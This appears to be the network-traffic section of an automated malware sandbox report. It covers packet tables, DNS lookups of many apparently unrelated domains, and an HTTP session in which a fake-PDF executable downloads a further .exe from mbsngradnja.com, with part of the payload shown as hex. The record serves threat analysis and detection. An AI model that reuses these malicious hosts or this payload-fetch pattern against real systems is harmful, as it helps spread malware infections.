May 29, 2024 15:45:56.183079004 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.184812069 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.189728975 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:56.189771891 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:56.194690943 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.882968903 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883028030 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883081913 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883115053 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883136988 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:58.883152962 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883187056 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883217096 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:58.883222103 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883253098 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:58.883253098 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883285999 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883322001 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.883353949 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:58.883374929 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:58.883451939 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:58.888422012 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.888456106 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.888500929 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:58.888520002 CEST	80	49803	45.61.137.215	192.168.2.9
May 29, 2024 15:45:58.888556957 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:58.888597012 CEST	49803	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:59.090795994 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:59.098851919 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:45:59.099006891 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:59.101278067 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:59.106483936 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:45:59.106617928 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:45:59.111861944 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.576543093 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.576561928 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.576574087 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.576591015 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.576601982 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.576613903 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.576615095 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.576626062 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.576692104 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.576693058 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.576725006 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.577065945 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.577078104 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.577090025 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.577111959 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.577162027 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.585486889 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.585520029 CEST	80	49804	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.585531950 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.585572958 CEST	49804	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.725923061 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.731091976 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.731168032 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.734415054 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.739553928 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:01.739599943 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:01.744549990 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.480976105 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481019974 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481059074 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481091022 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481096029 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.481126070 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481154919 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.481158018 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481193066 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481221914 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481255054 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481256962 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.481287956 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.481290102 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481312990 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.481312990 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.481323957 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.481350899 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.481431007 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.486287117 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.486349106 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.486383915 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.486383915 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.486418962 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.486481905 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.486613989 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.486670017 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.486701012 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.486702919 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.486731052 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.486737013 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.486762047 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.486773968 CEST	80	49805	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.486807108 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.486884117 CEST	49805	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.634577990 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.640624046 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.640717030 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.642667055 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.647650957 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:04.647743940 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:04.652781010 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301341057 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301405907 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301441908 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301475048 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301481009 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301511049 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301537991 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301541090 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301569939 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301569939 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301575899 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301603079 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301609993 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301636934 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301645041 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301678896 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301697969 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301697969 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301711082 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.301738024 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.301738024 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.306622028 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.306687117 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.306708097 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.306720018 CEST	80	49806	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.306725025 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.306757927 CEST	49806	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.446026087 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.451297998 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.451369047 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.455147982 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.460046053 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:07.460093975 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:07.465147018 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.901803017 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.901832104 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.901854992 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.901868105 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.901874065 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.901905060 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.901983023 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.902007103 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.902029037 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.902167082 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.902201891 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.902239084 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.902251959 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.902271032 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.902282953 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.902290106 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.902307987 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.902326107 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.902359009 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.907282114 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.907299042 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.907310963 CEST	80	49807	45.61.137.215	192.168.2.9
May 29, 2024 15:46:09.907322884 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.907345057 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:09.908574104 CEST	49807	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:10.051084042 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:10.056139946 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:10.056391001 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:10.058300018 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:10.063219070 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:10.063270092 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:10.068188906 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658502102 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658530951 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658566952 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658577919 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658580065 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.658587933 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658607006 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658610106 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.658620119 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658632994 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658652067 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.658659935 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.658687115 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.658720016 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658740997 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.658756971 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.658773899 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.663669109 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.663705111 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.663713932 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.663742065 CEST	80	49808	45.61.137.215	192.168.2.9
May 29, 2024 15:46:12.663752079 CEST	49808	80	192.168.2.9	45.61.137.215
May 29, 2024 15:46:12.663780928 CEST	49808	80	192.168.2.9	45.61.137.215

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 29, 2024 15:42:06.728523016 CEST	54688	53	192.168.2.9	1.1.1.1
May 29, 2024 15:42:07.010850906 CEST	53	54688	1.1.1.1	192.168.2.9
May 29, 2024 15:42:46.233161926 CEST	54424	53	192.168.2.9	1.1.1.1
May 29, 2024 15:42:46.501764059 CEST	53	54424	1.1.1.1	192.168.2.9
May 29, 2024 15:43:07.201517105 CEST	51007	53	192.168.2.9	1.1.1.1
May 29, 2024 15:43:07.232691050 CEST	53	51007	1.1.1.1	192.168.2.9
May 29, 2024 15:43:26.701582909 CEST	49545	53	192.168.2.9	1.1.1.1
May 29, 2024 15:43:27.013153076 CEST	53	49545	1.1.1.1	192.168.2.9
May 29, 2024 15:43:46.904958963 CEST	57785	53	192.168.2.9	1.1.1.1
May 29, 2024 15:43:46.918183088 CEST	53	57785	1.1.1.1	192.168.2.9
May 29, 2024 15:44:07.365470886 CEST	52461	53	192.168.2.9	1.1.1.1
May 29, 2024 15:44:07.391618967 CEST	53	52461	1.1.1.1	192.168.2.9
May 29, 2024 15:44:27.850119114 CEST	49427	53	192.168.2.9	1.1.1.1
May 29, 2024 15:44:27.865917921 CEST	53	49427	1.1.1.1	192.168.2.9
May 29, 2024 15:44:48.421008110 CEST	51702	53	192.168.2.9	1.1.1.1
May 29, 2024 15:44:48.463354111 CEST	53	51702	1.1.1.1	192.168.2.9
May 29, 2024 15:45:09.170502901 CEST	58703	53	192.168.2.9	1.1.1.1
May 29, 2024 15:45:09.204763889 CEST	53	58703	1.1.1.1	192.168.2.9
May 29, 2024 15:45:29.716234922 CEST	50286	53	192.168.2.9	1.1.1.1
May 29, 2024 15:45:30.702610016 CEST	50286	53	192.168.2.9	1.1.1.1
May 29, 2024 15:45:30.833817005 CEST	53	50286	1.1.1.1	192.168.2.9
May 29, 2024 15:45:30.833842993 CEST	53	50286	1.1.1.1	192.168.2.9
May 29, 2024 15:45:50.186135054 CEST	51646	53	192.168.2.9	1.1.1.1
May 29, 2024 15:45:50.243818998 CEST	53	51646	1.1.1.1	192.168.2.9
May 29, 2024 15:46:32.795833111 CEST	49206	53	192.168.2.9	1.1.1.1
May 29, 2024 15:46:32.814187050 CEST	53	49206	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 29, 2024 15:42:06.728523016 CEST	192.168.2.9	1.1.1.1	0xbd00	Standard query (0)	mbsngradnja.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:42:46.233161926 CEST	192.168.2.9	1.1.1.1	0xdb8d	Standard query (0)	www.imdcaam.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:43:07.201517105 CEST	192.168.2.9	1.1.1.1	0x160c	Standard query (0)	www.lovedacademy.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:43:26.701582909 CEST	192.168.2.9	1.1.1.1	0xa036	Standard query (0)	www.vivaness.club	A (IP address)	IN (0x0001)	false
May 29, 2024 15:43:46.904958963 CEST	192.168.2.9	1.1.1.1	0x5bd1	Standard query (0)	www.w937xb.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:44:07.365470886 CEST	192.168.2.9	1.1.1.1	0x753e	Standard query (0)	www.servicepmgtl.world	A (IP address)	IN (0x0001)	false
May 29, 2024 15:44:27.850119114 CEST	192.168.2.9	1.1.1.1	0x8417	Standard query (0)	www.sukhiclothing.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:44:48.421008110 CEST	192.168.2.9	1.1.1.1	0xf629	Standard query (0)	www.banditsolana.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:45:09.170502901 CEST	192.168.2.9	1.1.1.1	0x6e1f	Standard query (0)	www.mcapitalparticipacoes.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:45:29.716234922 CEST	192.168.2.9	1.1.1.1	0x7c0c	Standard query (0)	www.top-dao.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:45:30.702610016 CEST	192.168.2.9	1.1.1.1	0x7c0c	Standard query (0)	www.top-dao.com	A (IP address)	IN (0x0001)	false
May 29, 2024 15:45:50.186135054 CEST	192.168.2.9	1.1.1.1	0x7a2e	Standard query (0)	www.jasonnutter.golf	A (IP address)	IN (0x0001)	false
May 29, 2024 15:46:32.795833111 CEST	192.168.2.9	1.1.1.1	0x1499	Standard query (0)	www.cataclysmicgamingapparel.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 29, 2024 15:42:07.010850906 CEST	1.1.1.1	192.168.2.9	0xbd00	No error (0)	mbsngradnja.com		77.105.36.123	A (IP address)	IN (0x0001)	false
May 29, 2024 15:42:46.501764059 CEST	1.1.1.1	192.168.2.9	0xdb8d	No error (0)	www.imdcaam.com		216.40.34.41	A (IP address)	IN (0x0001)	false
May 29, 2024 15:43:07.232691050 CEST	1.1.1.1	192.168.2.9	0x160c	Name error (3)	www.lovedacademy.com	none	none	A (IP address)	IN (0x0001)	false
May 29, 2024 15:43:27.013153076 CEST	1.1.1.1	192.168.2.9	0xa036	No error (0)	www.vivaness.club		103.224.212.213	A (IP address)	IN (0x0001)	false
May 29, 2024 15:43:46.918183088 CEST	1.1.1.1	192.168.2.9	0x5bd1	Name error (3)	www.w937xb.com	none	none	A (IP address)	IN (0x0001)	false
May 29, 2024 15:44:07.391618967 CEST	1.1.1.1	192.168.2.9	0x753e	No error (0)	www.servicepmgtl.world		104.21.10.127	A (IP address)	IN (0x0001)	false
May 29, 2024 15:44:07.391618967 CEST	1.1.1.1	192.168.2.9	0x753e	No error (0)	www.servicepmgtl.world		172.67.190.40	A (IP address)	IN (0x0001)	false
May 29, 2024 15:44:27.865917921 CEST	1.1.1.1	192.168.2.9	0x8417	No error (0)	www.sukhiclothing.com	sukhiclothing.com		CNAME (Canonical name)	IN (0x0001)	false
May 29, 2024 15:44:27.865917921 CEST	1.1.1.1	192.168.2.9	0x8417	No error (0)	sukhiclothing.com		3.33.130.190	A (IP address)	IN (0x0001)	false
May 29, 2024 15:44:27.865917921 CEST	1.1.1.1	192.168.2.9	0x8417	No error (0)	sukhiclothing.com		15.197.148.33	A (IP address)	IN (0x0001)	false
May 29, 2024 15:44:48.463354111 CEST	1.1.1.1	192.168.2.9	0xf629	No error (0)	www.banditsolana.com		34.132.146.171	A (IP address)	IN (0x0001)	false
May 29, 2024 15:45:09.204763889 CEST	1.1.1.1	192.168.2.9	0x6e1f	Name error (3)	www.mcapitalparticipacoes.com	none	none	A (IP address)	IN (0x0001)	false
May 29, 2024 15:45:30.833817005 CEST	1.1.1.1	192.168.2.9	0x7c0c	No error (0)	www.top-dao.com	top-dao.com.lo1069.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
May 29, 2024 15:45:30.833817005 CEST	1.1.1.1	192.168.2.9	0x7c0c	No error (0)	top-dao.com.lo1069.faipod.com		101.36.116.238	A (IP address)	IN (0x0001)	false
May 29, 2024 15:45:30.833842993 CEST	1.1.1.1	192.168.2.9	0x7c0c	No error (0)	www.top-dao.com	top-dao.com.lo1069.faipod.com		CNAME (Canonical name)	IN (0x0001)	false
May 29, 2024 15:45:30.833842993 CEST	1.1.1.1	192.168.2.9	0x7c0c	No error (0)	top-dao.com.lo1069.faipod.com		101.36.116.238	A (IP address)	IN (0x0001)	false
May 29, 2024 15:45:50.243818998 CEST	1.1.1.1	192.168.2.9	0x7a2e	No error (0)	www.jasonnutter.golf	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
May 29, 2024 15:45:50.243818998 CEST	1.1.1.1	192.168.2.9	0x7a2e	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
May 29, 2024 15:46:32.814187050 CEST	1.1.1.1	192.168.2.9	0x1499	Name error (3)	www.cataclysmicgamingapparel.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mbsngradnja.com

45.61.137.215

www.imdcaam.com

www.vivaness.club

www.servicepmgtl.world

www.sukhiclothing.com

www.banditsolana.com

www.top-dao.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49709	77.105.36.123	80	2820	C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:07.047645092 CEST	84	OUT	GET /YLc7afPlL4RjCeK.exe HTTP/1.1 Host: mbsngradnja.com Connection: Keep-Alive
May 29, 2024 15:42:07.742849112 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 29 May 2024 13:42:07 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Wed, 29 May 2024 07:28:27 GMT Accept-Ranges: bytes Content-Length: 616448 Keep-Alive: timeout=5, max=100 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 df d7 56 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 50 09 00 00 16 00 00 00 00 00 00 1a 6e 09 00 00 20 00 00 00 80 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 6d 09 00 4f 00 00 00 00 80 09 00 dc 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 98 4f 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELVf0Pn @ @mOOT H.text N P `.rsrcR@@.relocf@BmHTP&0h~(rp}rp}{"}{"}0Q}}rp}rp}s}s}}( (0{o!{o"o#o$+o% ,+Xo&-,"{o{rpo++{o'o{Xo(o0
May 29, 2024 15:42:07.742865086 CEST	224	IN	Data Raw: 00 00 02 00 00 11 00 02 7b 0c 00 00 04 6f 21 00 00 0a 0a 02 7b 0c 00 00 04 6f 22 00 00 0a 06 6f 23 00 00 0a 6f 24 00 00 0a 0b 02 7b 08 00 00 04 6f 15 00 00 06 07 6f 29 00 00 0a 74 1a 00 00 01 0c 02 02 7b 0f 00 00 04 6f 2a 00 00 0a 13 05 12 05 28 Data Ascii: {o!{o"o#o${oo)t{o(+#X}{o(+#X}(,o-,(,o.s/ o0 Xo19{s2o3rp(4o
May 29, 2024 15:42:07.743079901 CEST	1236	IN	Data Raw: 35 00 00 0a 00 11 04 17 6f 36 00 00 0a 00 11 04 1f 0b 6f 37 00 00 0a 00 02 28 2c 00 00 0a 11 04 6f 38 00 00 0a 00 00 08 6f 39 00 00 0a 13 07 38 e4 00 00 00 11 07 6f 3a 00 00 0a a5 1e 00 00 01 13 08 00 73 3b 00 00 0a 13 09 11 09 1f 1e 6f 30 00 00 Data Ascii: 5o6o7(,o8o98o:s;o0 o1:{s2o3{X}._(<o=(>o?o@rp(A%-&+o$(4o5(AtXoBsC
May 29, 2024 15:42:07.743091106 CEST	224	IN	Data Raw: 73 5a 00 00 0a 6f 5b 00 00 0a 00 02 7b 11 00 00 04 28 5c 00 00 0a 6f 3f 00 00 0a 00 02 7b 11 00 00 04 20 26 01 00 00 1f 1c 73 32 00 00 0a 6f 33 00 00 0a 00 02 7b 11 00 00 04 72 d9 00 00 70 6f 35 00 00 0a 00 02 7b 11 00 00 04 20 b6 01 00 00 1f 20 Data Ascii: sZo[{(\o?{ &s2o3{rpo5{ sUoV{o7{rpoB{ o]{(^o={rp"AsZo[{(\o?{ z s2o3
May 29, 2024 15:42:07.743104935 CEST	1236	IN	Data Raw: 00 00 0a 00 02 7b 12 00 00 04 72 31 01 00 70 6f 35 00 00 0a 00 02 7b 12 00 00 04 1f 62 1f 27 73 55 00 00 0a 6f 56 00 00 0a 00 02 7b 12 00 00 04 1f 0a 6f 37 00 00 0a 00 02 7b 12 00 00 04 72 47 01 00 70 6f 42 00 00 0a 00 02 7b 12 00 00 04 16 6f 5f Data Ascii: {r1po5{b'sUoV{o7{rGpoB{o_{sCoD{oX{(Yo={rp"@AsZo[{(^o?{ ms2o3{rWpo5{hsUo
